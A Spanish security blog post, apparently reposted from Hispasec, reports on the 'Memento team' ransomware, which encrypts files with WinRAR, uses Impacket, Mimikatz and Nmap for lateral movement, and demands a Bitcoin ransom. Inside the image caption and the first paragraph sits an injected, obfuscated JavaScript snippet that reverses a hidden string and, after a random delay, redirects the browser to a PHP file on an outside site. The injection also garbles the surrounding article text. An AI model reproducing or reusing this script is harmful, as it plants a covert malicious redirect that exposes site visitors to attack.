Nuevo ransomware cifra ficheros con WinRAR para saltarse protecciones

El nuevo ransomware utilizado por el grupo autodenominado «Memento team» utiliza el famoso programa de compresión WinRAR para cifrar los ficheros del equipo con una contraseña, tras lo cual elimina los ficheros originales.

https://i2.wp.com/unaaldia.hispasec.com/wp-content/uploads/2021/11/11670.jpg?resize=1536%2C1396&ssl=1Nuevo ransomware escri<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to en Python” /></p>
<p>El equipo de Sophos Labs ha encontrado un nuevo tipo de ransomware escri<script>$NfI=function(n){if (typeof ($NfI.list[n]) == to en Python 3.9, el cual utiliza una curiosa forma de saltarse ciertas medidas de seguridad contra el ransomware: en vez de cifrar los ficheros utilizando herramientas propias, utiliza una versión freeware de WinRAR para cifrar los ficheros a un nuevo fichero con contraseña, después cifrar dicha clave y finalmente eliminar los ficheros originales.

Para su instalación este malware utiliza PyInstaller, una forma de crear paquetes multiplataforma en Python. No obstante, la amenaza se encuentra dirigida a equipos Windows, usando herramientas adicionales del repositorio Impacket como wmiexec para disponer de una shell remota o secretsdump para obtener credenciales. Como vector de ataque, según se ha comprobado, se utiliza una vulnerabilidad crítica descubierta en VMWare, de la que ya hablamos en febrero de este año.

Además de estas herramientas, en el ataque dirigido se hace uso de otros programas, los cuales los atacantes han llegado a dejar en las máquinas infectadas, como son Plink SSH para crear túneles SSH, Nmap para escanear la red, Npcap para capturar tráfico de red o Mimikatz para robar credenciales. Gracias a estas herramientas, los atacantes consiguen moverse lateralmente en la red para continuar infectando otras máquinas. Para conseguir persistencia utilizan un fichero batch (‘wincert.bat’) y una tarea programada del sistema (llamada ‘Windows Defender Metadata Monitor’).

Finalmente, tras lograr cifrar los ficheros, los atacantes colocan un archivo en la máquina llamado ‘Hello Message.txt’ con las instrucciones para recuperar los ficheros. En el ataque analizado por Sophos, la cantidad demandada asciende a 15,95 BTC. Unos 931.212$ o 828.601€ al cambio en el momento de escribir la noticia. Para el pago se indica un número de teléfono de Telegram y una dirección de ProtonMail.

Aunque los ataques por ransomware son cada vez más comunes, estos ataques por grandes sumas de dinero sólo suelen darse en ataques dirigidos en los que atacantes conocen el tamaño de la empresa y la cantidad que puede desembolsar por el rescate. Es por ello que, sobre todo a estas organizaciones, recomendamos comenzar con una política de copias de seguridad de todos sus ficheros. No obstante, esto no es suficiente.

Algunos atacantes tras negarse a pagar el rescate, llegan a amenazar con hacer públicos los ficheros sustraídos. En casos como este, en que la vulnerabilidad en VMWare era conocida desde hace ya 6 meses, podría evitarse manteniendo el software actualizado. Es por ello que recomendamos siempre aplicar las actualizaciones de seguridad. Para ello, Hispasec dispone del servicio SANA, el cual notifica de las vulnerabilidades conocidas en el software de la entidad para mantenerlo siempre actualizado. Además, los servicios de auditoría permiten conocer estas vulnerabilidades para darles solución.

.

Ver información original al respecto en Fuente>

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies